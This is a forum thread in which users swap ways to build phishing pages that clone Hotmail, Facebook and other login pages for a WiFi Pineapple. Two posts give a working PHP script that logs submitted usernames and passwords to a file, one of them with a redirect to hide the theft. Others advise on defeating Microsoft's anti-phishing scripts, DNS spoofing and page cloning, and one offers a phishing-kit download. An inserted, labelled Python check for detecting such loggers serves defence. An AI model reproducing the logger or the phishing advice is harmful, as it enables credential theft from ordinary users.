omfgplz, Posted December 19, 2012

Can anyone support? :) Either with files or a guide with how to for nubies like me.

coolgeek, Posted December 20, 2012 (edited December 20, 2012 by coolgeek)

I have found the easiest way to clone a site is to use Google Chrome, browse to the site, right-click and select Save As... This gives you the option to download the entire page with all dependencies. From there, just use this resource to modify what happens to the form data. I think Darren wrote the following little PHP file to store the user credentials from the form data received:

    <?php
    $ref = $_SERVER['HTTP_REFERER'];
    $today = date("F j, Y, g:i a");
    if (isset($_POST['name']) && !empty($_POST['name'])) {
        $nam = stripslashes($_POST['name']);
        $pas = stripslashes($_POST['pass']);
        $nam = htmlspecialchars($nam, ENT_QUOTES);
        $pas = htmlspecialchars($pas, ENT_QUOTES);
        $content = $today . " -- " . $ref . " -- " . $nam . " -- " . $pas;
        $filed = @fopen("bitches.txt", "a+");
        @fwrite($filed, "$content\n");
        @fclose($filed);
    }
    ?>

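Added example, not part of the original thread or any poster's code: a defender-side triage check that flags PHP files shaped like the logger quoted above (a password-like form field read, an append-mode file open and a file write in the same file). The function name `triage`, the indicator list and the three sample sources are assumptions constructed for illustration.

```python
import re

# Indicators taken from the shape of the logger quoted in the post above.
CHECKS = {
    "reads password-like form field": re.compile(
        r"""\$_(?:POST|REQUEST|GET)\[\s*['"](?:pass|passwd|password|pwd)['"]\s*\]""", re.I),
    "opens a file in append mode": re.compile(
        r"""\bfopen\s*\([^)]*,\s*['"]a\+?b?['"]\s*\)|FILE_APPEND""", re.I),
    "writes to a file": re.compile(r"\b(?:fwrite|fputs|file_put_contents)\s*\(", re.I),
    "suppresses file errors with @": re.compile(r"@\s*(?:fopen|fwrite|fputs|fclose)\s*\(", re.I),
    "records HTTP_REFERER": re.compile(r"""\$_SERVER\[\s*['"]HTTP_REFERER['"]\s*\]""", re.I),
}
# All three must be present before a file is flagged; the rest add context.
REQUIRED = ("reads password-like form field", "opens a file in append mode", "writes to a file")

def triage(source):
    """Return (suspicious, matched_indicators) for one PHP source string."""
    hits = [name for name, rx in CHECKS.items() if rx.search(source)]
    return all(r in hits for r in REQUIRED), hits

# Constructed samples (not real files).
LOGGER = r'''<?php
$ref = $_SERVER['HTTP_REFERER'];
$pas = htmlspecialchars(stripslashes($_POST['pass']), ENT_QUOTES);
$f = @fopen("out.txt", "a+");
@fwrite($f, "$ref -- $pas\n");
@fclose($f);
?>'''
LOGIN = r'''<?php
if (password_verify($_POST['password'], $row['hash'])) { session_regenerate_id(true); }
?>'''
ACCESS_LOG = r'''<?php
$f = fopen("access.log", "a");
fwrite($f, date("c") . " " . $_SERVER['REMOTE_ADDR'] . "\n");
fclose($f);
?>'''

if __name__ == "__main__":
    for name, src in (("logger", LOGGER), ("login", LOGIN), ("access_log", ACCESS_LOG)):
        print(name, triage(src))
```

A hit is a prompt for manual review of the file and of what it writes, not a verdict; the legitimate login handler and the plain access logger in the samples each match only part of the pattern and are not flagged.
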
loozr, Posted December 20, 2012

Has anybody managed to make a functional hotmail phish yet? I'm struggling to get it working.. The thing is that it seems M$ is trying to avoid phishing attacks by using some scripting. I have very limited knowledge in web programming, but have been snooping around a little bit in their code, and it seems that

1. You can't avoid the scripts totally because then you will not be able to type username/password.
2. The script mbox.js is checking if a cookie is valid by checking session and pc id. If this cookie is not found to be legit, you will be redirected to https://login.live.com/cookiesDisabled.srf?..

Now I guess there is some magic happening in the 13th line in the hotmail source code, but for a noob it's quite exhausting to make sense of..

Sud0x3, Posted December 20, 2012

If you can't achieve this then you have a long way to go and I am assuming no one here is going to do this for you. I will however give you a little information. You need a copy of the login page and a script that will take the data entered into user name and password fields and save or send it somewhere. More complex scripts are sometimes able to take the information and log the user into the target site. To use this attack on someone with any knowledge of computing whatsoever you will need to employ attacks like dns spoofing.

@loozr you do not require any of the scripts hosted on the target site, you simply need a site that looks like the target.

loozr, Posted December 20, 2012

@Sud0x3 That's absolutely true. However, for me it's faster to hack around in the existing code than to make a similar page myself from scratch (since my knowledge in code is quite limited, I can read some, but not write). I have managed to edit out most of the scripting in this page, and successfully come up with an ok result. However, I have a little problem in getting the "Sign in" button to do some posting now.. or, actually it's doing something, it's removing the input, but I'm not getting any post in return. And yes I have edited the name of the input fields to equal the "pickup" script.. Is there any app that can trace the actions in a given webpage?

AlienG, Posted January 4, 2013

Can someone help me out? My problem is that on the below script after testing Facebook page nothing is saved on pineapple.log. Or should I use the one Darren has posted? Thanks

    <?php
    $ref = $_SERVER['HTTP_REFERER'];
    $today = date("F j, Y, g:i a");
    if (isset($_POST['name']) && !empty($_POST['name'])) {
        $nam = stripslashes($_POST['name']);
        $pas = stripslashes($_POST['pass']);
        $nam = htmlspecialchars($nam, ENT_QUOTES);
        $pas = htmlspecialchars($pas, ENT_QUOTES);
        $content = $today . " -- " . $ref . " -- " . $nam . " -- " . $pas;
        $filed = @fopen("pineapple/phish.log", "a+");
        @fwrite($filed, "$content\n");
        @fclose($filed);
    }
    ?>
    <html><body>
    <script type=text/javascript">
    function goBack() { window.history.back() }
    </script>
    </head>
    <body onload="goBack()">
    </body></html>

RebelCork, Posted January 5, 2013

Has anyone tried using SET to try to clone the page? If you are using BT5, go to var/www and browse files. Should do a passable job. If you want to wait a while longer, wait for WhistleMaster's new module, the MITM/keylogger, to come about. All depending on what you want :)

TylerCPU, Posted February 3, 2013

I created a whole bunch of phishing pages that will work with the pineapple. Outlook, Hotmail, netflix, blogger, youtube, facebook, twitter, instagram, etc... Please use them responsibly. Link: **Removed**

NullNull, Posted February 5, 2013

> I created a whole bunch of phishing pages that will work with the pineapple. Outlook, Hotmail, netflix, blogger, youtube, facebook, twitter, instagram, etc... Please use them responsibly. Link: **Removed**

Very nice work TylerCPU !!! I really liked the thing with the images at hotmail instagram and outlook! Any chance of creating the mobile versions of them? :D

TylerCPU, Posted February 9, 2013

> Very nice work TylerCPU !!! I really liked the thing with the images at hotmail instagram and outlook! Any chance of creating the mobile versions of them? :D

Thanks. I don't know if I will create a mobile version of them. It took me a long time to just create hotmail, outlook, and instagram by hand for the desktop alone.

MastermanSachin, Posted March 19, 2013

> I created a whole bunch of phishing pages that will work with the pineapple. Outlook, Hotmail, netflix, blogger, youtube, facebook, twitter, instagram, etc... Please use them responsibly. Link: **Removed**

Will you please upload that .zip file again? This one has been deleted.

Mr-Protocol, Posted March 19, 2013

http://forums.hak5.org/index.php?/topic/28813-psa-phishing-pages/